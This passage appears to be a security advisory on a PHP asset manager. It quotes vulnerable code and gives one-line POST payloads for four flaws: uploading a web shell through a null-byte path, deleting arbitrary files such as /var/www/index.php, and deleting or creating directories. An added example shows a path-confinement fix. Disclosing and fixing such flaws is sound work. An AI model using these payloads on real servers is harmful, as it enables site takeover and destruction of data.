1. Arbitrary file upload [magic_quotes_gpc=Off]
Vulnerable file: assetmanager.php
[POST] inpCurrFolder2=/var/www/shell.php%00
Vulnerable code: line 42
if(isset($_FILES["File1"]))
{
    if(isset($_POST["inpCurrFolder2"]))$currFolder=$_POST['inpCurrFolder2']; // the directory can be crafted; when magic_quotes_gpc=off, arbitrary files can be written
    if(isset($_REQUEST["inpFilter"]))$ffilter=$_REQUEST["inpFilter"];
    if($MaxFileSize && ($_FILES['File1']['size'] > $MaxFileSize))
    {
        $sMsg = "The file exceeds the maximum size allowed.";
    }
    else if(!isTypeAllowed($_FILES['File1']['name']))
    {
        $sMsg = "The File Type is not allowed.";
    }
    else if (move_uploaded_file($_FILES['File1']['tmp_name'], $currFolder."/".basename($_FILES['File1']['name'])))
    {
        $sMsg = "";
        $sUploadedFile=$_FILES['File1']['name'];
        @chmod($currFolder."/".basename($_FILES['File1']['name']), 0644);
    }
    else
    {
        $sMsg = "Upload failed.";
    }
}
-------------------
2. Arbitrary file deletion due to missing access control
Vulnerable file: assetmanager.php
[POST] inpFileToDelete=/var/www/index.php
Vulnerable code: line 72
if(isset($_POST["inpFileToDelete"]))
{
    $filename=pathinfo($_POST["inpFileToDelete"]);
    $filename=$filename['basename'];
    if($filename!="")
        unlink($currFolder . "/" . $filename);
    $sMsg = "";
}
-------------------
3. Arbitrary directory deletion due to missing access control
Vulnerable file: folderdel_.php
[POST] inpCurrFolder=/var/www/upload/
Vulnerable code: line 3
if(isset($_POST["inpCurrFolder"]))
{
    $sDestination = pathinfo($_POST["inpCurrFolder"]);
    //DELETE ALL FILES IF FOLDER NOT EMPTY
    $dir = $_POST["inpCurrFolder"];
    $handle = opendir($dir);
    while($file = readdir($handle))
        if($file != "." && $file != "..") unlink($dir . "/" . $file);
    closedir($handle);
    if(rmdir($_POST["inpCurrFolder"])==0)
        $sMsg = "";
    else
        $sMsg = "<script>document.write(getTxt('Folder deleted.'))</script>";
}
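
Sections 1 to 3 all pass a client-supplied folder straight to a filesystem call. The following is an added example (not code from the affected product) of confining such a value to one asset directory before use; the function name resolve_in_root() and the demo directory names are assumptions, and the demo tree is constructed in the system temp directory.

```php
<?php
// Added example. resolve_in_root() is a hypothetical helper, not vendor code.

/**
 * Resolve a client-supplied folder to an existing directory inside $root.
 * Returns the canonical path, or null if the request must be rejected.
 */
function resolve_in_root(string $root, string $userFolder): ?string
{
    // A NUL byte is the truncation trick from section 1 (shell.php%00).
    if (strpos($userFolder, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", symlinks and duplicate slashes, and
    // returns false when the target does not exist.
    $rootReal = realpath($root);
    $real = realpath($userFolder);
    if ($rootReal === false || $real === false || !is_dir($real)) {
        return null;
    }
    // Compare with a trailing separator so a sibling such as
    // "<root>-evil" does not pass as a child of "<root>".
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo tree (sample data, removed again at the end).
$root = sys_get_temp_dir() . '/assets_demo_' . getmypid();
mkdir($root . '/images', 0755, true);
mkdir($root . '-evil', 0755, true);

$cases = [
    $root . '/images',          // inside the root: accepted
    $root . '/images/../..',    // climbs out of the root: rejected
    $root . '-evil',            // sibling sharing the name prefix: rejected
    $root . "/shell.php\0",     // NUL byte as in section 1: rejected
    '/',                        // absolute path outside the root: rejected
];
foreach ($cases as $c) {
    $r = resolve_in_root($root, $c);
    echo addcslashes($c, "\0"), ' => ', $r === null ? 'REJECTED' : 'OK', PHP_EOL;
}
rmdir($root . '/images'); rmdir($root); rmdir($root . '-evil');
```

Path confinement does not address the missing access control named in sections 2 to 4: the handler still has to verify that the caller is an authenticated, authorised user before any upload, unlink or rmdir runs.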
-------------------
4. Arbitrary directory creation due to missing access control
Vulnerable file: foldernew.php
[POST] inpCurrFolder=/var/www/&inpNewFolderName=123
Vulnerable code: line 3
if(isset($_POST["inpNewFolderName"]))
{
    $sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];
    if(is_dir($sFolder)==1)
    {//folder already exist
        $sMsg = "<script>document.write(getTxt('Folder already exists.'))</script>";
    }
    else
    {
        //if(mkdir($sFolder))
        if(mkdir($sFolder,0755))